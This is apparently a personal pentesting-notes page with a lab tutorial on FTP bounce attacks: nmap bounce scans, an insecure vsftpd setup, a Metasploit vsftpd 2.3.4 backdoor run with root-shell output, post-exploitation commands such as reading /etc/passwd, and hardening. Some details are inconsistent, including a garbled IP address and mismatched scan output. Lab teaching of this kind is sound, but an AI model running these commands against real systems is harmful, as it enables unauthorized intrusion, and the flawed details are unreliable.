> For the complete documentation index, see [llms.txt](https://mainekhacker-1.gitbook.io/mainekhacker/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://mainekhacker-1.gitbook.io/mainekhacker/networkpentestingnotes/ftp-bounce-attack.md). # FTP Bounce Attack ## FTP Bounce Attack #### Lab 1: FTP Bounce Attacks * Use a tool like Nmap to scan for open FTP ports on a target system. * Use a tool like Metasploit to launch an FTP bounce attack against the target system {% hint style="warning" %} Only ever run this against machines you own in your isolated home lab. The host-only network adapter in VirtualBox ensures your attack traffic never leaves your machine. {% endhint %} ### Types of Attacks on FTP Servers #### Common Attack Types | **Attack Type** | **Description** | | --------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------- | | Anonymous Authentication | Allows users to log in without a specific identity, often using a common username like "anonymous." This can expose sensitive data. | | Directory Traversal Attack | Attackers exploit vulnerabilities to access files outside the intended directory structure, potentially overwriting or creating unauthorized files. | | Cross-Site Scripting (XSS) | Malicious scripts are sent to users via web applications, which can compromise user data and session information. | | Brute Force Attacks | Attackers systematically try multiple username and password combinations to gain unauthorized access. | | Password Sniffing | Intercepting unencrypted FTP traffic to capture usernames and passwords transmitted in plain text. | | Dridex-based Malware Attack | Malware that uses FTP credentials to avoid detection, often targeting users through infected email attachments. | #### Additional Vulnerabilities * **Unencrypted Data Transmission**: FTP transmits data in plain text, making it easy for attackers to intercept sensitive information. * **Weak Passwords**: Many users employ simple passwords, making it easier for attackers to gain access. * **Misconfigured Servers**: Servers that allow anonymous access or lack proper security measures are prime targets for exploitation. ## FTP Bounce Attack – What We're Actually Doing ### The Simple Analogy Think of it like this: You want to send an anonymous letter to someone, but you don't want them to know it came from you. So instead of mailing it yourself, you trick a **middleman** (the FTP server) into delivering it for you. The recipient sees the letter came from the middleman — not you. That's exactly what FTP bounce does. *** ### The Real Scenario `YOU (Attacker) → FTP Server (Middleman) → Victim Machine 192.168.56.101 192.168.56.102 192.168.56.103` You never directly touch the victim. The FTP server does your dirty work, and all the traffic the victim sees comes from the FTP server's IP address — not yours. *** ### Why FTP Was Designed This Way (The History) FTP was created in the 1970s and has two modes of operation. In **active mode**, when you connect to an FTP server and ask for a file, you tell the server "send the data to THIS address and THIS port" using the `PORT` command. The server was designed to simply trust whatever address you gave it. In the 1970s this made sense — the internet was small, everyone trusted each other, and nobody imagined someone would abuse this. The `PORT` command looks like this: ``` PORT 192,168,56,103,0,80 ``` This tells the FTP server — send data to IP `192.168.56.103` on port `80`. The server just... does it. No questions asked. *** ### What an Attacker Does With This Instead of giving your own IP in the PORT command, you give the IP of a **third machine you want to attack**. The FTP server then makes connections to that third machine on your behalf. This gives you two powerful capabilities: **1. Anonymous Port Scanning** — You can use the FTP server to probe what ports are open on another machine. The victim machine only sees connection attempts from the FTP server, not from you. This was a major way attackers hid their identity before modern logging. **2. Firewall Bypass** — This is the really dangerous part. Imagine the victim machine has a firewall that blocks connections from the outside internet — but it trusts the FTP server because they're on the same internal network. By bouncing your attack through the FTP server, you inherit that trust. You're essentially tunneling through the firewall using the FTP server as a relay. ``` Internet → [FIREWALL blocks you] → Internal Network ↑ You → FTP Server (trusted by firewall) → Internal Victim ``` ## FTP Bounce Attack – Ubuntu Home Lab Setup ### Lab Architecture ``` Attacker Machine Target Machine [Kali Linux] <——> [Ubuntu Server] 192.168.56.101 192.168.56.102 Both on Host-Only Network (VirtualBox/VMware) ``` {% stepper %} {% step %} ### Step 1 – Set Up the Environment **On VirtualBox/VMware, create two VMs:** * **Kali Linux** (attacker) — download from kali.org * **Ubuntu Server** (target) — download from ubuntu.com **Set both VMs to Host-Only networking** so they're isolated from your real network. **On Ubuntu Server — install a vulnerable FTP server (vsftpd 2.3.4 or proftpd):** ```bash # Update system sudo apt update # Install vsftpd sudo apt install vsftpd -y # OR install proftpd (more vulnerable, better for labs) sudo apt install proftpd -y ``` **Configure vsftpd to allow bounce (insecure config for lab purposes):** ```bash sudo nano /etc/vsftpd.conf ``` Add/modify these lines: ``` port_enable=YES connect_from_port_20=YES ftp_data_port=20 pasv_enable=NO # Disable passive — forces active mode (needed for bounce) anonymous_enable=YES # Allow anonymous login for testing write_enable=YES listen=YES ``` ```bash sudo systemctl restart vsftpd sudo systemctl status vsftpd ``` {% endstep %} {% step %} ### Step 2 – Discover the Target with Nmap (From Kali) **Basic FTP port scan:** ```bash nmap -p 21 192.168.56.102 ``` **Service version detection:** ```bash nmap -sV -p 21 192.168.56.102 ``` ``` Nmap Result: └─$ nmap -P -A 10.0.3.214 Starting Nmap 7.95 ( https://nmap.org ) at 07:30 EST Nmap scan report for 10.0.3.214 Host is up (0.00022s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.5 | ftp-syst: | STAT: | FTP server status: | Connected to 10.0.3.1 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 4 | vsFTPd 3.0.5 - secure, fast, stable |_End of status |_ftp-anon: Anonymous FTP login allowed (FTP code 230) 80/tcp open http Apache httpd 2.4.52 |_http-title: 403 Forbidden |_http-server-header: Apache/2.4.52 (Ubuntu) MAC Address: F2:2F:A7:8C:6A:32 (Unknown) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.19 Network Distance: 1 hop Service Info: Host: 127.0.0.1; OS: Unix TRACEROUTE HOP RTT ADDRESS 1 0.22 ms 10.0.3.214 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.16 seconds ``` **FTP-specific NSE scripts:** ```bash # lets Check for anonymous login nmap -p 21 --script ftp-anon 192.168.56.10 ``` {% endstep %} {% step %} ### Step 3 – Manual FTP Bounce (Understand the Concept First) Before using Metasploit, do it manually so you understand what's happening. **Connect to FTP anonymously:** ```bash ftp 192.168.56.102 # Username: anonymous # Password: anything@email.com ``` **The bounce attack concept — PORT command abuse:** ```bash # Normal PORT command tells server where to send data back TO YOU # Bounce abuses this — you tell the FTP server to connect to a THIRD machine instead # Inside FTP session: PORT 192.168.56.103,0,80 # This tells the FTP server to connect to 192.168.56.103 on port 80 # The FTP server becomes a proxy — scanning or connecting on YOUR behalf # The traffic appears to come from the FTP server, not you ``` {% endstep %} {% step %} ### Step 4 – FTP Bounce with Nmap (Port Scan via Bounce) This is the classic use — use the FTP server to scan another host: ```bash # Syntax: nmap -b :@ nmap -b anonymous:anonymous@192.168.56.102 192.168.56.103 ``` This makes the FTP server scan `192.168.56.103` — the scan traffic comes from the FTP server's IP, not yours. This is the core of why it was dangerous — it enabled anonymous port scanning and firewall bypass. {% endstep %} {% step %} ### Step 5 – Metasploit FTP Bounce Attack **Launch Metasploit:** ```bash msfconsole ``` **Search for FTP modules:** ```bash msf6 > search ftp bounce msf6 > search vsftpd ``` **Use the vsftpd 2.3.4 backdoor module (classic vulnerable version):** ```bash msf6 > use exploit/unix/ftp/vsftpd_234_backdoor msf6 exploit > show options msf6 exploit > set RHOSTS 192.168.56.102 msf6 exploit > set RPORT 21 msf6 exploit > run ``` If successful: ``` [*] 192.168.56.102:21 - Banner: 220 vsFTPd 2.3.4 [*] 192.168.56.102:21 - USER: 331 Please specify the password. [+] 192.168elicit.102:21 - Backdoor service has been spawned, handling... [+] 192.168.56.102:21 - UID: uid=0(root) gid=0(root) [*] Found shell. [*] Command shell session 1 opened ``` **For FTP bounce scanning via Metasploit:** ```bash msf6 > use auxiliary/scanner/ftp/ftp_version msf6 auxiliary > set RHOSTS 192.168.56.102 msf6 auxiliary > run # Also try too: msf6 > use auxiliary/scanner/ftp/anonymous msf6 auxiliary > set RHOSTS 192.168.56.102 msf6 auxiliary > run ``` {% endstep %} {% step %} ### Step 6 – Analyze Results **Check if attack succeeded:** ```bash # In your Metasploit shell session: id # who are you? whoami cat /etc/passwd # can you read sensitive files? uname -a # target OS info netstat -an # what ports are open internally? ``` **Verify the bounce worked in Nmap:** * If the Nmap bounce scan returns port states — bounce is working * If it returns `FAILED` — the server has bounce protection {% endstep %} {% step %} ### Step 7 – Verify Defenses (Blue Team Perspective) After attacking, harden the target and confirm it blocks the attack: ```bash # On Ubuntu target — fix vsftpd config sudo nano /etc/vsftpd.conf # Add these to block bounce: pasv_enable=YES port_enable=NO # Disables PORT command = kills bounce ``` Then re-run your Nmap bounce scan — it should fail now. This completes the full attack/defend cycle. {% endstep %} {% endstepper %} ### Quick Reference Summary | Step | Command | Purpose | Result | | ---------------- | ------------------------------------------ | --------------------- | ------- | | Discover FTP | `nmap -sV -p 21 ` | Find open FTP | Yes | | Check bounce | `nmap --script ftp-bounce ` | Confirm vulnerability | Not got | | Check anon login | `nmap --script ftp-anon ` | Confirm access | Yes | | Bounce scan | `nmap -b anon:anon@ ` | Scan via FTP proxy | Yes | | Exploit vsftpd | `use exploit/unix/ftp/vsftpd_234_backdoor` | Get shell | Yes | **Thank You For Reading..** --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://mainekhacker-1.gitbook.io/mainekhacker/networkpentestingnotes/ftp-bounce-attack.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.